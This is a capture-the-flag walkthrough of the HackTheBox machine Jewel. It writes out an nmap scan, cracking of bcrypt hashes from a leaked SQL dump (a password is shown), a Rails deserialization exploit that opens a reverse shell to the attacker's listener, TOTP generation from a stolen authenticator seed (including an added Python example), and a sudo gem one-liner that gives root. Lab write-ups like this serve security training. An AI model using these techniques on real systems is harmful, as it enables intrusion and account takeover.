Today we are going to crack a machine called Jewel. It was created by polarbearer. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
· Network Scanning
  o Nmap Scan
· Enumeration
  o Enumerating HTTP Service on 8000
  o Enumerating Database File
  o Extracting Password Hashes
  o Cracking Hash using John the Ripper
  o Enumerating the Gemfile
  o Searching for CVE
· Exploitation
  o Enumerating the Deserialization Vulnerability
  o Searching for an Exploit
  o Running the Exploit
  o Getting Shell as bill User
  o Reading User Flag
· Privilege Escalation
  o Enumerating Authenticator File
  o Using Online Authenticator for Getting TOTP
  o Enumerating Sudo Permissions
  o Exploiting Permissions on Gem
  o Getting Root Shell
  o Reading the Root Flag
Walkthrough
Network Scanning
To attack any machine, we need its IP address. Machines hosted on HackTheBox have a static IP address.
IP Address assigned: 10.129.104.163
Now that we have the IP address, we need to enumerate the open ports on the machine. For this, we run an nmap scan.
nmap -sC 10.129.104.163
The Nmap scan quickly gave us some great information. It showed that SSH (22), HTTP (8000) and HTTP Proxy (8080) services are running on the machine. We can see that the service on 8000 redirects to gitweb. It is worth a look.
Enumeration
We do not possess credentials for the SSH login, so we move over to the HTTP service for enumeration. Opening the HTTP service in the web browser, we find that it is running the Git web interface, which is basically a web version of browsing git repositories and files. We found one file inside the projects directory. We click on the .git to advance further.
http://10.129.104.163:8000/gitweb/
We move further to find a log directory containing one commit. Clicking on the commit link, we are presented with the list of files inside the commit. Among them we find a bd.sql file, which seemed interesting.
We click on the bd.sql file to find the database dump. It contained two users and their password hashes. We copied the hash values and created two files, each named after the user it belongs to.
bill bill@mail.htb $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
jennifer jennifer@mail.htb $2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy
We now have two files, bill and jennifer. We used the rockyou dictionary with John the Ripper to try to crack the hashes. After a considerable amount of time and multiple failures, it cracked the password for the user bill but not the one for jennifer. We now have the password for the user bill.
john -w=/usr/share/wordlists/rockyou.txt bill
We tried the newly cracked password on the SSH service but were unsuccessful. This made us think that the credential would be usable at another point down the road. Moving back to the gitweb, we enumerated it further and found the Gemfile. It almost always contains the version information for a Ruby application. Reading it, we found that the application runs Ruby 2.5.5 and Rails 5.2.2.1. Time to search for exploits.
We googled the versions with the CVE keyword and found the MITRE CVE listing. It contains the list of all the vulnerabilities that particular version is at risk of.
Exploitation
We see a bunch of vulnerabilities. The first one requires PostgreSQL, and we found no evidence that it is installed on the target server. Then there is a Denial-of-Service attack; we do not want to DoS the server. Then we have a bunch of CSRF vulnerabilities, but our enumeration showed no scenario in which a CSRF attack would succeed. Last, we came across the deserialization vulnerability. This seemed of some interest.
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=rails
We googled for any ready exploit for this CVE and we were in luck. Some user had already created an exploit that gives a shell directly. Surprisingly, it was the third link in a Google search. You can find the exploit by clicking here.
We browsed the Git repository of that exploit and read the code to understand how it works. It takes the target IP address, browses to the application and creates a user by the name of doctor. It then logs in with the credentials of the newly created user, which gives it an authentication token. Next it browses to the Profile Update section of the application, inputs a serialized payload containing a shell command and sends it to the target server. Due to the vulnerability, the server treats it as genuine serialized data and deserializes it, and when it reaches the shell invocation it executes that as a genuine instruction as well. To run this exploit, you need the target IP address, a local IP address and a local port. We provided all these and started a listener on the port specified.
Here we have the following configuration:
raj.py: Exploit script name
10.129.104.163: Remote Host
10.10.14.48: Local Host
1234: Local Port
python3 raj.py 10.129.104.163 10.10.14.48 1234
In a few moments, we see that we have a shell as the user bill. We start enumerating for the user flag and find it inside bill's home directory. We read the user flag.
nc -lvp 1234
ls -la
cat user.txt
Privilege Escalation
Now we see a hidden file named .google_authenticator. This seems interesting. We read it to find a code inside. Holding the thought about the authenticator code, we ran sudo -l to enumerate the binaries that we can execute with elevated privileges. It asks for the password of user bill, which we cracked earlier. We enter spongebob as bill's password. Then it asks us for a verification code. This means that the Google Authenticator file is not a rabbit hole: we need to set up an authenticator using the code provided to us.
cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
sudo -l
python -c 'import pty;pty.spawn("bash")'
sudo -l
spongebob
We searched for an authenticator. The search offered various browser plugins, but we preferred not to install a plugin in our browser. We found a web-based TOTP Token Generator instead. All it required was the code we found, and it provided the TOTP we can use.
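The online generator above simply runs RFC 6238 over that seed. The Python below is an added example, not part of the original write-up: it parses a .google_authenticator file into seed, PAM options and scratch codes, derives the current code the way the generator does, and checks a code with a WINDOW_SIZE-style tolerance; the sample file is constructed (RFC 6238 test seed, made-up options) and the function names are chosen here. It shows why the seed file must be protected like a password: anyone who can read it can produce valid codes.

```python
import base64
import hashlib
import hmac
import struct
import time


def parse_google_authenticator(text):
    """Split a ~/.google_authenticator file into its three parts.

    Line 1 is the base32 TOTP seed; lines starting with '"' are PAM module
    options (e.g. WINDOW_SIZE); any remaining lines are one-time scratch codes.
    """
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    seed = lines[0]
    options = [ln[1:].strip() for ln in lines[1:] if ln.startswith('"')]
    scratch = [ln for ln in lines[1:] if not ln.startswith('"')]
    return seed, options, scratch


def totp(seed_b32, for_time=None, step=30, digits=6):
    """RFC 6238 TOTP: HMAC-SHA1 over the time-step counter, then dynamic truncation."""
    seed = seed_b32.strip().upper()
    # Google Authenticator writes the seed without base32 padding; restore it.
    key = base64.b32decode(seed + "=" * (-len(seed) % 8))
    counter = int(time.time() if for_time is None else for_time) // step
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def verify(seed_b32, code, now, window=1):
    """Accept a code from any of the 2*window+1 adjacent 30-second steps,
    which is what the PAM module's WINDOW_SIZE option controls."""
    return any(hmac.compare_digest(totp(seed_b32, now + k * 30), code)
               for k in range(-window, window + 1))


# Constructed sample file (not the target's): the seed is the RFC 6238 test key
# "12345678901234567890" in base32; options and scratch code are made up.
SAMPLE_FILE = """GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" RATE_LIMIT 3 30
" WINDOW_SIZE 3
" TOTP_AUTH
12345678
"""

if __name__ == "__main__":
    seed, options, scratch = parse_google_authenticator(SAMPLE_FILE)
    print("seed:", seed, "options:", options, "scratch codes:", scratch)
    print("current code:", totp(seed))  # whoever holds the seed can print this
```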
We ran sudo -l again, this time entering the code it asks for, and found that we can execute gem. Lucky for us, gem is one of the LOLBINs, meaning it can be directly exploited using a single line of code.
sudo -l
spongebob
104007
We head to the LOLBINs website and find the one-liner to exploit the sudo permissions on gem. It gave us root in no time. This concludes the machine.
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
id
cd /root
cat root.txt